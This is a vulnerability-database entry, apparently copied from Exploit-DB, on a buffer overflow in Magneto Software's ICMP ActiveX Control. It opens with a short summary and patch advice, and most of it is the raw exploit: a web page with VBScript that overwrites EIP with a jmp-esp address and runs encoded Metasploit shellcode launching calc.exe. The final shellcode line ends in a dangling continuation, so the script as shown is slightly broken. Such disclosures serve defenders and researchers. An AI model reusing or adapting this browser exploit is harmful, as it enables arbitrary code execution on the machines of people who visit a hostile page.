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ICMP ActiveX Control
Buffer Overflow
Not specified
Product Name: ICMP ActiveX Control
Affected Version From: Not specified
Affected Version To: Not specified
Patch Exists: NO
Related CWE: Not specified
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Magneto Software ICMP ActiveX Control Buffer Overflow

The Magneto Software ICMP ActiveX Control is vulnerable to a buffer overflow. This vulnerability can be exploited by an attacker to execute arbitrary code on a target system. The vulnerability was discovered by s4squatch and was published on 04/13/10. The exploit involves sending a specially crafted buffer to the SKIcmp.ocx ActiveX control, causing it to overwrite the EIP register with a malicious address, leading to code execution. The exploit includes a shellcode payload that spawns the Windows calculator (calc.exe).


The vendor has not provided a patch for this vulnerability. Users are advised to avoid using the vulnerable ActiveX control or to remove it from their systems if not required. Additionally, users should exercise caution when browsing untrusted websites or opening untrusted documents to reduce the risk of exploitation.

Exploit-DB raw data:

<object classid='clsid:3A86F1F2-4921-4C75-AF2C-A1AA241E12BA' id='target'></object>
<script language='vbscript'>
'Magneto Software ICMP ActiveX Control Buffer Overflow
'Discovered by:  s4squatch
'website:  www.securestate.com
'Date Discovered: 03/11/09
'Exploit Written: 02/02/10
'Vendor Notified: 02/02/10 --> NO RESPONSE
'Vendor Notified: 02/11/10 --> NO RESPONSE
'Vendor Notified: 02/17/10 --> NO RESPONSE
'Published 04/13/10
'www:  http://www.magnetosoft.com/products/skicmp/skicmp_features.htm
'Download:  http://www.magnetosoft.com/downloads/skicmp_setup.exe
'Function AddDestinationAddressEntry ( ByVal bstrDestinationAddress As String ) As Long
'progid = "SKICMPLib.SKIcmp"

buff1 = String(199, "A")													'buff
ecx = unescape("%f3%30%9d%7c")										'fix up ecx since with a valid address since it gets trashed
buff2 = String(8, "B")														'buff
eip = unescape("%f3%30%9d%7c")										'jmp esp 7c9d30f3 shell32.dll XP SP3 fully patched
nopsled = String(16, unescape("%90"))

'win32_exec -  EXITFUNC=seh CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
shellcode =	unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%48%49") & _
						unescape("%49%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%68") & _
						unescape("%58%50%30%42%31%42%41%6b%41%41%78%32%41%42%32%42") & _
						unescape("%41%30%42%41%41%58%38%41%42%50%75%59%79%39%6c%4a") & _
						unescape("%48%50%44%63%30%35%50%43%30%4c%4b%57%35%77%4c%4c") & _
						unescape("%4b%51%6c%35%55%64%38%77%71%6a%4f%4c%4b%62%6f%45") & _
						unescape("%48%4e%6b%31%4f%45%70%55%51%6a%4b%73%79%6e%6b%70") & _
						unescape("%34%6c%4b%46%61%7a%4e%70%31%4b%70%4e%79%6e%4c%6c") & _
						unescape("%44%49%50%52%54%67%77%5a%61%59%5a%34%4d%55%51%6f") & _
						unescape("%32%4a%4b%79%64%37%4b%51%44%41%34%35%54%71%65%6d") & _
						unescape("%35%4e%6b%53%6f%47%54%65%51%4a%4b%31%76%4e%6b%46") & _
						unescape("%6c%30%4b%6e%6b%51%4f%75%4c%54%41%58%6b%4c%4b%77") & _
						unescape("%6c%6e%6b%66%61%58%6b%6d%59%33%6c%46%44%46%64%6a") & _
						unescape("%63%35%61%6b%70%71%74%6e%6b%63%70%54%70%6f%75%6f") & _
						unescape("%30%54%38%56%6c%4c%4b%61%50%36%6c%4e%6b%34%30%35") & _
						unescape("%4c%4c%6d%6e%6b%43%58%75%58%58%6b%54%49%4c%4b%4d") & _
						unescape("%50%6c%70%43%30%57%70%55%50%6e%6b%32%48%35%6c%71") & _
						unescape("%4f%67%41%6b%46%53%50%56%36%6b%39%48%78%4d%53%4f") & _
						unescape("%30%71%6b%32%70%33%58%4c%30%4d%5a%56%64%43%6f%52") & _
						unescape("%48%6a%38%4b%4e%4c%4a%66%6e%31%47%4b%4f%6b%57%61") & _
						unescape("%73%70%61%30%6c%71%73%64%6e%70%65%73%48%72%45%35") & _

statics_wet_dream = buff1 + ecx + buff2 + eip + nopsled + shellcode

target.AddDestinationAddressEntry statics_wet_dream